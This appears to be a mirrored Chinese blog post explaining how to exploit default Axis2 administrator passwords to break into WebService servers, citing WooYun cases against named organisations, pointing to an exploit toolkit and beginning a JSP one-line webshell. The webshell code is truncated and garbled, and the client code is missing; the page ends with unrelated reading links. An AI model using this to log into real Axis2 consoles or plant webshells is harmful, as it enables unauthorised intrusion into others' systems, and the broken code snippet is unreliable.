zoukankan      html  css  js  c++  java
  • 利用Axis2默认口令安全漏洞可入侵WebService网站

    利用Axis2默认口令安全漏洞可入侵WebService网站

    近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。

    乌云Axis2默认口令安全弱点利用案例:

    航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全目测已被其他人渗透过)

    乐信通某服务器axis2服务存在弱口令可上传webshell(root权限)

    中国科学院网Web-services(axis2)系统任意代码执行

    工具准备:

    Axis2利用工具包: cat.arr

    cat.arr工具说明与下载参见大牛“PHP to Java”的博客http://javaweb.org/?p=1548

    JSP一句话木马

    服务器端一句话木马代码:

    <%if(request.getparameter(“f”)!=null)(new>

    <%if(request.getparameter(“f”)!=null)(new>

    客户端提交代码:

  • 相关阅读:
    【转】Hive Data Manipulation Language
    【转】Vim显示中文乱码
    【转】Twitter算法面试题详解(Java实现)
    【转】判断单链表中是否存在环及查找环的入口点
    【转】SQL语句面试题
    【转】经典的SQL语句面试题
    【转】Java实现折半查找(二分查找)的递归和非递归算法
    【转】[IT综合面试]牛人整理分享的面试知识:操作系统、计算机网络、设计模式、Linux编程,数据结构总结
    【笔试/面试题】中科创达——9.28(持续更新ing)
    百度2014校园招聘笔试题(成都站,软件研发岗)——2014.09.21
  • 原文地址:https://www.cnblogs.com/firstdream/p/5952921.html
Copyright © 2011-2022 走看看